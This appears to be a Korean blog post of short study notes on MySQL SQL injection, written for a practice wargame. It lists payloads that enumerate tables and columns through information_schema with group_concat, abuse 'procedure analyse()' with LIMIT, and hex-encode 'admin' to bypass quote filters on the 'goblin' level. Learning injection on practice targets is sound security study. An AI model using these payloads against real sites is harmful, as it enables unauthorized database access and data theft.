information_schema.tables

데이터베이스의 table 정보를 가지고 있다. 

information_schema

http://luckyyowu.tistory.com/22


procedure anaylse()

select * from (table) where id='1' limit 2,1 procedure anaylse()

현재 실행중인 칼럼에 대한 정보를 가져옴

limit으로 칼럼의 몇번째 테이블을 가져올지 설정이 가능하다.

http://tempuss.tistory.com/entry/Limit-%EC%A0%88%EC%97%90%EC%84%9C%EC%9D%98-SQL-Injection



table이름 가져오는 쿼리 


 select group_concat(table_name),4 from information_schema.tables where table_schema=schema()#


** table에는 user table인 base table이 있고 system전용 테이블이 있다.

따라서 where table_type='base table'을 넣어주면 테이블 찾기가 더 쉽다.


칼럼명 가져오는 쿼리

select 1,2,group_concat(column_name),3 from information_schema.columns where table_name='flag



쿼리 인젝션에 문자열 넣고싶을때

ex) los goblin

https://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php?no=5%20or%20id=0x61646d696e

0x61646d696e처럼 hex로 넣는다

select id from prob_goblin where id='guest' and no=5 or id=0x61646d696e

' > SQL injection' 카테고리의 다른 글

blind sql injection 활용 함수  (0) 2017.01.31
sql 필터링 우회기법  (0) 2017.01.31
sqlmap 펌  (0) 2017.01.29
sqlmap post testing  (0) 2017.01.29
공격 쿼리 모음  (0) 2017.01.15

+ Recent posts